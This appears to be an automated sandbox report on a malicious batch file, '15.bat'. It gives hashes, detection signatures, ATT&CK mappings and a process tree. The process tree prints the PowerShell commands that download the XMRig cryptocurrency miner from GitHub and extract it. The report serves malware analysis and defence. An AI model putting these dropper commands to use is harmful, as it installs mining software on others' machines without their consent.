Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    15.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\15.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2908

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DETX6ERLDGOO53RE2UHN.temp
    Filesize

    7KB

    MD5

    efc24f71b3b6e0be5d6f675466d25d51

    SHA1

    b2995055b7f2ba6d5cca5f3654a100fec0bf1dab

    SHA256

    30dec5c30862d862a54e01b18e9c1a7f02ce3936abfe003d2d2e0eedd5b3b87a

    SHA512

    874c6b341d2e68291fa86f27a86ca6b58044621bd0c1774c4584f062f1f179d0b5126239b414f24122cec7fbd621ee7fe47dd8c4d1532fd631691a81d4312ff5

  • memory/2900-4-0x000007FEF633E000-0x000007FEF633F000-memory.dmp
    Filesize

    4KB

  • memory/2900-5-0x000000001B4A0000-0x000000001B782000-memory.dmp
    Filesize

    2.9MB

  • memory/2900-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
    Filesize

    32KB

  • memory/2900-7-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
    Filesize

    9.6MB

  • memory/2900-8-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
    Filesize

    9.6MB

  • memory/2900-9-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
    Filesize

    9.6MB

  • memory/2900-10-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
    Filesize

    9.6MB

  • memory/2900-11-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
    Filesize

    9.6MB

  • memory/2900-12-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
    Filesize

    9.6MB

  • memory/2908-19-0x00000000027A0000-0x00000000027A8000-memory.dmp
    Filesize

    32KB

  • memory/2908-18-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
    Filesize

    2.9MB